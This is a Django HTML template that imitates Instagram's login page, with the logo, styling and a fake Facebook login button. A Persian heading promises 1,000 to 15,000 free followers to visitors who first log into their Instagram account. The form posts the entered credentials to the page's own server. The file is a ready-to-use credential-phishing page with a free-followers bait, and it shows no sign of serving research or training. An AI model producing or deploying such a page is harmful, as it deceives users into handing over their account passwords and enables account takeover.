{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>دریافت فالور رایگان</title>
    <style>
        body {
            font-family: sans-serif;
            background-color: #fafafa;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
              Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
            box-sizing: border-box;
          }
          
          a {
            text-decoration: none;
          }
          
          .container {
            max-width: 1000px;
            margin: 0 auto;
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
            margin-top: 3rem;
            font-size: 14px;
          }
          
          .box {
            max-width: 350px;
            width: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            background-color: #ffff;
            border: 1px solid #e6e6e6;
            border-radius: 1px;
            margin: 0 0 10px;
            flex-grow: 1;
            padding: 1rem !important; 

          }
          
          .heading {
            background-image: url({% static 'instagram.png' %});
            background-size : 65px;
            background-repeat : no-repeat;
            background-position: center;
            margin: 22px auto 12px;
            padding:6px;
            height: 51px;
            width: 177px;
            overflow: hidden;
            text-align: center;
            font-weight : bold;
            font-family: Vazirmatn, sans-serif;
          }
          
          .field {
            margin: 10px 0;
            position: relative;
            font-size: 14px;
            width: 100%;
            text-overflow: ellipsis;
          }
          
          input {
            padding: 9px 0px 7px 9px;
            font-size: 12px;
            width: 16rem;
            height: 1.2rem;
            outline: none;
            background: #fafafa;
            border-radius: 3px;
            border: 1px solid #efefef;
          }
          
          /* label intial position*/
          

    
          /* hiding placeholder in all browsers */
          

          
          /* hiding  placeholder in mozilla */
          .login-form ::-moz-placeholder {
            color: transparent;
          }

          
          .login-button {
            text-align: center;
            width: 100%;
            padding: 0.5rem;
            border: 1px solid transparent;
            background-color: #3897f0;
            color: #fff;
            font-weight: 600;
            font-size: 14px;
            cursor: pointer;
          }
          
          .separator {
            display: flex;
            justify-content: space-between;
            align-items: center;
            color: #999;
            margin-top: 6px;
          }
          
          .separator .line {
            height: 1px;
            width: 40%;
            background-color: #dbdbdb;
          }
          
          .other {
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
          }
          
          .fb-login-btn {
            margin: 1rem;
            border: 0;
            cursor: pointer;
            font-size: 14px;
            color: #385185;
            font-weight: 600;
            background: transparent;
          }
          
          .fb-icon {
            color: #385185;
            font-size: 1rem;
            padding-right: 1px;
          }
          
          .forgot-password {
            font-size: 11px;
            color: #003569;
          }
          
          .signup {
            color: #3897f0;
            font-weight: 600;
          }
    </style>
</head>
<body>

    <h1 style='direction:rtl; font-size:12px; color:red; text-align:center'>برای دریافت فالور رایگان ، ابتدا وارد حساب کاربری خود در اینستاگرام شوید<br> سپس مقدار فالور خود را از 1000 تا 15000 انتخاب کنید تا برای شما واریز شود. </h1>
    <div class="container">
        <div class="box">
          <div class="heading" ></div>
          <form class="login-form" method='post'>{% csrf_token %}
            {{form.as_p}}
            
              <button type='submit' class="login-button" title="login">Log In</button>
              <div class="separator">
                <div class="line"></div>
                <p>OR</p>
                <div class="line"></div>
              </div>
            <div class="other">
              <button class="fb-login-btn" type="button">
                <i class="fa fa-facebook-official fb-icon"></i>
                <span class="">Log in with Facebook</span>
              </button>
              <a class="forgot-password" href="#">Forgot password?</a>
            </div>
          </form>
        </div>
      </div>
</body>
</html>

